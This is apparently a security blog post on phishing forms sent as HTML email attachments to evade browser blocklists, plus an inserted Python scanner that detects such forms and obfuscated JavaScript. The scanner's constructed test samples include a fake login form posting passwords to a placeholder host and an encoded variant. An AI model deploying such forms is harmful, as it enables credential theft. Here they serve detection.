Phishing is the practice of sending fake emails, claiming to be from a bank, credit card company, or some other organization that holds your personal information.

These emails usually claim that your account has been limited, or information needs to be updated, or some other reason that you need to go log into the site and correct the problem.

The email then contains a link taking you to the site purportedly belonging to the organization, which is, in fact, a site owned by the scammer.  Your information, credit card details, bank username and password, or other private information is then given to the scammer, if you fill out the form and click the submit button.

To combat this activity, security industry players have created databases of known phishing sites, such as http://www.phishtank.com, which web browsers and security software can use to verify sites that you visit.  These databases accept submissions of new phishing sites (I have submitted some myself), which are then checked and verified by other users and in turn used to warn visitors to the phishing site that it is not legitimate.

As with anything in the security industry, though, this is a game of one-upmanship.  To bypass the online databases of phishing sites, the phishers are now using a new tactic, which I've noticed a couple of times in the past month.  Undoubtedly, this method will grow in popularity, due to the difficulty of controlling it.

What the phishers are now doing, instead of emailing a link to a fake online login form, is to email the entire form itself.  The form shows as an attachment to an email, which, when clicked, opens in your web browser, just the same as a regular phishing site.  What is different, though, is instead of being loaded from http://www.phishers.com/FakePayPalLogin/, enabling your browser's phishing protection to warn you, it's loaded directly from your own computer.

A local file, loaded from your own computer, is assumed to be safe. In fact, a local file has to be assumed safe, or various components of Windows would break, due to the way Microsoft has chosen to integrate these components.

The form is a pure HTML document, like a web page, which simply directs the form data to a malicious server set up to harvest data from victims.  In one case, I've seen it encoded using JavaScript to be difficult to analyze.
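As an added example that is not from the original post, here is one defensive check a mail gateway or desktop scanner could apply to an HTML attachment: it parses the file for a form that sends a password field to a remote host, and for the decode-then-write JavaScript patterns used to hide such a form. The sample attachments are constructed, and 203.0.113.10 is a documentation-range placeholder rather than any real host.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Decode-then-write patterns that hide an inline form from casual inspection.
OBFUSCATION_RE = re.compile(
    r"(document\.write\s*\(\s*unescape|unescape\s*\(\s*['\"](?:%[0-9a-fA-F]{2}){16,}"
    r"|atob\s*\(|String\.fromCharCode\s*\()"
)

class FormScanner(HTMLParser):
    """Collects form targets, password inputs and script bodies from one HTML file."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_inputs, self.script_text = [], 0, []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def analyze_html_attachment(html):
    """Return the indicators found; 'suspicious' is True when any of them fires."""
    p = FormScanner()
    p.feed(html)
    p.close()
    remote_hosts = set()
    for action in p.actions:
        u = urlparse(action)
        if u.scheme in ("http", "https") and u.netloc:  # form leaves the local file
            remote_hosts.add(u.netloc)
    obfuscated = bool(OBFUSCATION_RE.search("".join(p.script_text)))
    return {
        "remote_form_hosts": sorted(remote_hosts),
        "password_inputs": p.password_inputs,
        "obfuscated_script": obfuscated,
        "suspicious": bool(remote_hosts and p.password_inputs) or obfuscated,
    }

# Constructed samples (not real phishing kits): a plain form and a JavaScript-encoded one.
PLAIN_FORM = """<html><body><h1>Account limited</h1>
<form method="post" action="http://203.0.113.10/collect.php">
<input name="user"><input type="password" name="pass"><input type="submit"></form>
</body></html>"""
ENCODED_FORM = """<html><body><script>
document.write(unescape('%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%32%30%33%2E%30%2E%31%31%33%2E%31%30%2F%22%3E'));
</script></body></html>"""

if __name__ == "__main__":
    for name, doc in (("plain", PLAIN_FORM), ("encoded", ENCODED_FORM)):
        print(name, analyze_html_attachment(doc))
```

A scanner like this catches the two shapes the post describes but not every variant, so it belongs alongside, not instead of, user awareness of unexpected HTML attachments.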

At this point, I can't think of a way to handle this.  The only real way to find dangerous files on your own computer is through antivirus and antispyware software.  But since the form is simply an HTML web page, with no dangerous content, it's very difficult, if not impossible, for antivirus software to detect.

It will be interesting to see what the security industry comes up with to combat this, and I'll be working on the problem myself, also.  In the meantime, keep an eye out for such attachments supposedly coming from these types of sites.